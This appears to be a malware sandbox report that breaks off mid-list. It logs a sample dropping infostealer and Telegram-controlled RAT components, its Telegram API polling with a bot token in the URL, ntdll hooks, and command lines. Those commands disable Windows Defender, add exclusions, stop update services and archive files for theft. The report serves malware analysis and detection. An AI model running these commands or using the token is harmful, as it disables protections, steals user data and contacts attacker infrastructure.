{"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49850	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:23 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:23 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:23 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49851	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:58:24 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:58:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:58:24 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:58:24 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	21:56:14
Start date:	04/06/2024
Path:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TS-240605-Millenium1.exe"
Imagebase:	0x7ff6ceb20000
File size:	38'730'377 bytes
MD5 hash:	4CE7DEC7F0AF15277EEC727A9E20142E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:56:17
Start date:	04/06/2024
Path:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TS-240605-Millenium1.exe"
Imagebase:	0x7ff6ceb20000
File size:	38'730'377 bytes
MD5 hash:	4CE7DEC7F0AF15277EEC727A9E20142E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:56:17
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:56:17
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:56:18
Start date:	04/06/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym
Imagebase:	0x360000
File size:	32'972'420 bytes
MD5 hash:	B72CBBAF7F2E3E31E90944AC747798D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:56:20
Start date:	04/06/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff647770000
File size:	25'152'315 bytes
MD5 hash:	B9F3E6E06F33EE7078F514D41BE5FAAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:56:20
Start date:	04/06/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff7dfd20000
File size:	7'759'042 bytes
MD5 hash:	363F8437904AD603ECDF0D5329610D88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1878137948.00000235B9F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 51%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:56:21
Start date:	04/06/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff7dfd20000
File size:	7'759'042 bytes
MD5 hash:	363F8437904AD603ECDF0D5329610D88
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:56:22
Start date:	04/06/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff647770000
File size:	25'152'315 bytes
MD5 hash:	B9F3E6E06F33EE7078F514D41BE5FAAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:56:22
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:56:22
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:56:22
Start date:	04/06/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym
Imagebase:	0xce0000
File size:	19'846'974 bytes
MD5 hash:	8198AD352AB70C2C974AB5C716956CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:56:24
Start date:	04/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:56:25
Start date:	04/06/2024
Path:	C:\ProgramData\main.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\main.exe"
Imagebase:	0x25eb5a30000
File size:	5'872'344 bytes
MD5 hash:	5DF3E2C717F267899F37EC6E8FC7F47A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:56:25
Start date:	04/06/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x7ff621880000
File size:	12'576'970 bytes
MD5 hash:	48B277A9AC4E729F9262DD9F7055C422
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	21:56:25
Start date:	04/06/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff65f170000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff633870000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff633870000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	21:56:26
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	21:56:30
Start date:	04/06/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x7ff621880000
File size:	12'576'970 bytes
MD5 hash:	48B277A9AC4E729F9262DD9F7055C422
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff70ed80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6b7320000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	21:56:31
Start date:	04/06/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
Imagebase:	0x7ff7085c0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
